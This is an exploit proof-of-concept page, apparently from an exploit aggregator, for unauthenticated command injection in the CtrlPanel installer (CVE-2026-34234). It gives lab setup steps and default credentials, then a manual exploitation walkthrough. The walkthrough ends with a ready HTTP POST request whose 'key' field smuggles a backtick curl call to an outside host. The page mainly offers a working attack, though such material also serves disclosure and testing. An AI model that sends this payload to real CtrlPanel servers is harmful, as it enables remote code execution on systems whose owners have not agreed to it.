## https://sploitus.com/exploit?id=317C5B4A-42D4-5260-A33C-516AC3E15A51
-----
# Summary
- This is a POC for CVE-2026-34234 ([https://cvefeed.io/vuln/detail/CVE-2026-34234](https://cvefeed.io/vuln/detail/CVE-2026-34234)).
- Application: [CtrlPanel](https://github.com/Ctrlpanel-gg/panel)
- Vulnerability: Unauthenticated RCE using installer script
- A Dockerfile that spawns a vulnerable server can be found in `/ctrlPanel`
- `echo '127.0.0.1 ctrl pter' >> /etc/hosts`
- `docker run -p8088:80 -it --rm --name this this`
- Pterodactyl Server Creds
- username: admin
- password: Password1
- ctrlPanel Server creds
- username: admin
- password: password
- `exploit.py` will run a 'fake Pterodactyl server' and send the POST request to trigger the Command Injection.
------
# Manual Exploitation
### Fake Pterodactyl server
- Host a server that returns `{}` on routes:
- /api/application/users
- /api/client/account
### Command Injection POST
- send a POST request with fields:
- url: is the url the server started in the **Prerequisites** section.
- key: COMMAND INJECTION
```
'``'
```
- clientKey: anything
- checkPtero
```http
POST /installer/index.php HTTP/1.1
Host: ctrl
Content-Length: 524
Content-Type: application/x-www-form-urlencoded
url=http://fakePtero&key=meow'`curl http://someHost.meow`'&clientkey=1&checkPtero=1
```